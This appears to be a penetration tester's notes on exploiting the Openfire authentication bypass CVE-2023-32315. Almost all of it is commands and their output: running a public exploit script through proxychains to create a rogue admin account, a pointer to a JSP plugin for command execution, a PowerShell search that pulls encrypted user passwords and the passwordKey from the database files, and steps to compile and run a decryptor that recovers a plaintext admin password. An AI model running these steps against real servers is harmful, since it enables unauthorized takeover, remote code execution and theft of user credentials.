Openfire

CVE-2023-32315

Will create an admin user you can connect with

https://github.com/miko550/CVE-2023-32315.git

(venv) user@host:/tmp/CVE-2023-32315$ proxychains -q -f /tmp/TARGET python3 CVE-2023-32315.py -t http://127.0.0.1:9090

 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗ ██████╗ ██████╗  ██╗███████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗██╔═══╝  ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝ ╚══════╝╚═════╝  ╚═╝╚══════╝

Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!

[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node01wfjwtqsu4pm9db2qwuymjf71.node0 + csrf: UoYm8eG8pyHq9cf
User added successfully: url: http://127.0.0.1:9090 username: 4lc588 password: ddz4yl

You can upload a plugin for command execution

https://gitlab.com/charles.gargasson/divers/-/tree/master/openfirejspexec

Users Dump

Passwords are encrypted (not hashed), you can therefore decrypt them

Depending of DB you can retrieve encrypted passwords from files :

select-string -erroraction 'silentlycontinue' " OFUSER ","passwordKey" "C:\Program Files\Openfire\embedded-db\*"|Out-String -width 999

openfire.log:5:INSERT INTO OFUSER VALUES('4lc588',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'001718712585459','001718712585459')
openfire.log:7:DELETE FROM OFUSER WHERE USERNAME='4lc588'
openfire.log:8:INSERT INTO OFUSER VALUES('4lc588','8HrMfkZMynmNvENRHv4NEMXE9xo=','WpM52WO+P5gH++q+MHwKAstnwFE=','aVmbZt7QxrqC19ZV/N+GjdnlPID32Le3',4096,NULL,'e4053e1b3d2c3e372b09f9adb67abaff719e04fe1dc3fb53',NULL,NULL,'001718712585459','001718712585459')
openfire.script:95:INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@bla.bla','001700223740785','0')
openfire.script:113:INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)

Look for the passwordKey value, and encrypted passwords of users

then, use this project to decrypt passwords : https://github.com/c0rdis/openfire_decrypt

git clone https://github.com/c0rdis/openfire_decrypt.git /tmp/openfire_decrypt
cd /tmp/openfire_decrypt
javac OpenFireDecryptPass.java

java OpenFireDecryptPass becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)